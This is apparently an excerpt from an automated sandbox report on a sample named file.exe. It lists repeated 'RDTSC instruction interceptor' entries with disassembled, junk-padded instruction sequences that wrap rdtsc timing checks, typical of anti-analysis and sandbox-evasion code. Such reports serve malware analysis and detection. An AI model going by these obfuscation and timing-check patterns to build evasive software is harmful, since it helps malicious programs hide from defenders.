              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0522 second address: 51B0568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48BFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F65E53D48C4h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65E53D48C7h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0568 second address: 51B05D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D951Fh 0x00000009 jmp 00007F65E53D9523h 0x0000000e popfd 0x0000000f mov di, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007F65E53D9525h 0x0000001b xchg eax, esi 0x0000001c jmp 00007F65E53D951Eh 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F65E53D9527h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05D6 second address: 51B05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05DC second address: 51B05E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05E0 second address: 51B05F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov al, 72h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B05F4 second address: 51B0628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d pushfd 0x0000000e jmp 00007F65E53D951Dh 0x00000013 add ecx, 2FC3B186h 0x00000019 jmp 00007F65E53D9521h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0628 second address: 51B0671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D48C7h 0x00000008 pop esi 0x00000009 jmp 00007F65E53D48C9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65E53D48BDh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0671 second address: 51B0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0693 second address: 51B0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0699 second address: 51B069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B069D second address: 51B06AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06AF second address: 51B06B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06B3 second address: 51B06B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06B7 second address: 51B06BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06BD second address: 51B06D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06D1 second address: 51B06D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A003F second address: 51A007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov bx, D25Ch 0x00000019 push edi 0x0000001a push ecx 0x0000001b pop edx 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F65E53D48C3h 0x00000025 push FFFFFFFEh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A007A second address: 51A0095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9527h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0095 second address: 51A00C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 012D7E59h 0x0000000e pushad 0x0000000f jmp 00007F65E53D48BDh 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, 02h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A00C9 second address: 51A00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A00CD second address: 51A00F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7483E011h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D48C1h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A00F0 second address: 51A0105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0105 second address: 51A0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F65E53D48B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65E53D48BDh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0132 second address: 51A0145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C922h 0x00000007 mov esi, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0145 second address: 51A0149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0149 second address: 51A014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A014F second address: 51A0162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0162 second address: 51A01F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d mov bh, ah 0x0000000f jmp 00007F65E53D9527h 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 movsx edx, cx 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F65E53D951Ah 0x00000028 pop eax 0x00000029 pushad 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F65E53D951Ch 0x00000031 add cx, CDA8h 0x00000036 jmp 00007F65E53D951Bh 0x0000003b popfd 0x0000003c mov bx, cx 0x0000003f popad 0x00000040 movzx esi, di 0x00000043 popad 0x00000044 mov eax, dword ptr fs:[00000000h] 0x0000004a jmp 00007F65E53D9527h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007F65E53D951Bh 0x00000058 mov ah, EDh 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A01F9 second address: 51A023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48C7h 0x00000009 and ecx, 69D8F5AEh 0x0000000f jmp 00007F65E53D48C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A023E second address: 51A0244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0244 second address: 51A02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48BBh 0x00000009 sbb cl, FFFFFFBEh 0x0000000c jmp 00007F65E53D48C9h 0x00000011 popfd 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 push esi 0x0000001a push edi 0x0000001b pop eax 0x0000001c pop edi 0x0000001d movzx eax, dx 0x00000020 popad 0x00000021 sub esp, 18h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F65E53D48C9h 0x0000002b sbb cx, 2756h 0x00000030 jmp 00007F65E53D48C1h 0x00000035 popfd 0x00000036 mov bx, ax 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c call 00007F65E53D48C8h 0x00000041 pop ecx 0x00000042 pushad 0x00000043 push edx 0x00000044 pop eax 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a jmp 00007F65E53D48C4h 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A02F5 second address: 51A02FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 2EA5169Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A02FF second address: 51A031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A031E second address: 51A0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0322 second address: 51A0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0328 second address: 51A0337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D951Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0337 second address: 51A03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, 37C2h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F65E53D48C9h 0x00000018 or si, 3F96h 0x0000001d jmp 00007F65E53D48C1h 0x00000022 popfd 0x00000023 mov esi, 6A04D407h 0x00000028 popad 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F65E53D48C8h 0x00000032 add esi, 30C69EE8h 0x00000038 jmp 00007F65E53D48BBh 0x0000003d popfd 0x0000003e mov esi, 785A26DFh 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F65E53D48BCh 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A03D9 second address: 51A03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A03E8 second address: 51A043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F65E53D48C1h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 call 00007F65E53D48BCh 0x00000016 mov esi, 53E391A1h 0x0000001b pop eax 0x0000001c mov bl, 92h 0x0000001e popad 0x0000001f mov eax, dword ptr [75AF4538h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edi 0x00000029 mov esi, edi 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A043B second address: 51A04BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushfd 0x00000010 jmp 00007F65E53D951Ah 0x00000015 add ax, DAC8h 0x0000001a jmp 00007F65E53D951Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xor eax, ebp 0x00000023 jmp 00007F65E53D951Fh 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F65E53D951Bh 0x00000032 add cx, 01BEh 0x00000037 jmp 00007F65E53D9529h 0x0000003c popfd 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A04BC second address: 51A04C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A04C1 second address: 51A04D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D951Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A04D4 second address: 51A04F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D48C6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A04F6 second address: 51A0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0505 second address: 51A050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A050B second address: 51A050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A058F second address: 51A0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0593 second address: 51A05EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test ecx, ecx 0x00000009 jmp 00007F65E53D951Dh 0x0000000e jns 00007F65E53D9536h 0x00000014 jmp 00007F65E53D951Eh 0x00000019 add eax, ecx 0x0000001b jmp 00007F65E53D9520h 0x00000020 mov ecx, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F65E53D9527h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A05EB second address: 51A0615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 call 00007F65E53D48BBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test ecx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D48C2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51901BD second address: 51901C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51901C2 second address: 5190244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F65E53D48BDh 0x0000000a or cx, 7096h 0x0000000f jmp 00007F65E53D48C1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c mov edx, 3D595D1Eh 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F65E53D48BBh 0x0000002a jmp 00007F65E53D48C3h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 pushfd 0x00000033 jmp 00007F65E53D48C6h 0x00000038 add ax, 7A48h 0x0000003d jmp 00007F65E53D48BBh 0x00000042 popfd 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190244 second address: 519028E instructions: 0x00000000 rdtsc 0x00000002 mov ax, 3DBFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F65E53D9520h 0x00000011 pushfd 0x00000012 jmp 00007F65E53D9522h 0x00000017 sub si, 9FD8h 0x0000001c jmp 00007F65E53D951Bh 0x00000021 popfd 0x00000022 popad 0x00000023 sub esp, 2Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519028E second address: 5190294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190294 second address: 51902BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 mov eax, 56B61E13h 0x0000000d mov ecx, 4FDA886Fh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F65E53D9521h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190399 second address: 519039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519039F second address: 51903A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903A3 second address: 51903A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903A7 second address: 51903B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903B6 second address: 51903BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903BA second address: 51903C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903C0 second address: 519042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48C1h 0x00000009 or ax, 9526h 0x0000000e jmp 00007F65E53D48C1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F65E53D48C0h 0x0000001a or ax, F6C8h 0x0000001f jmp 00007F65E53D48BBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 test al, al 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F65E53D48C5h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519042A second address: 519049A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F65E53D96B4h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65E53D951Bh 0x00000017 and si, 526Eh 0x0000001c jmp 00007F65E53D9529h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 lea ecx, dword ptr [ebp-14h] 0x00000029 jmp 00007F65E53D9523h 0x0000002e mov dword ptr [ebp-14h], edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F65E53D9525h 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519049A second address: 519049F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51904BC second address: 51904C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51904C2 second address: 51904F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F65E53D48BAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dh, ah 0x00000017 jmp 00007F65E53D48C9h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51904F8 second address: 519053F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D9527h 0x00000008 pop ecx 0x00000009 jmp 00007F65E53D9529h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65E53D951Dh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519053F second address: 5190545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905C2 second address: 5190607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F6655CE73E7h 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 mov ax, 44D5h 0x00000015 popad 0x00000016 mov ebx, dword ptr [ebp+08h] 0x00000019 jmp 00007F65E53D9520h 0x0000001e lea eax, dword ptr [ebp-2Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F65E53D9527h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190607 second address: 51906C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D48BFh 0x00000008 pop ecx 0x00000009 mov edi, 42266E4Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esp 0x00000012 jmp 00007F65E53D48C0h 0x00000017 mov dword ptr [esp], esi 0x0000001a jmp 00007F65E53D48C0h 0x0000001f nop 0x00000020 jmp 00007F65E53D48C0h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov bh, BDh 0x00000029 jmp 00007F65E53D48BAh 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 push ecx 0x00000033 pop edx 0x00000034 mov dl, cl 0x00000036 popad 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F65E53D48C0h 0x0000003e sub al, 00000058h 0x00000041 jmp 00007F65E53D48BBh 0x00000046 popfd 0x00000047 pop ecx 0x00000048 popad 0x00000049 push ecx 0x0000004a jmp 00007F65E53D48C4h 0x0000004f mov dword ptr [esp], ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F65E53D48C7h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51906FA second address: 5190701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 20h 0x00000006 popad 0x00000007 rdtsc
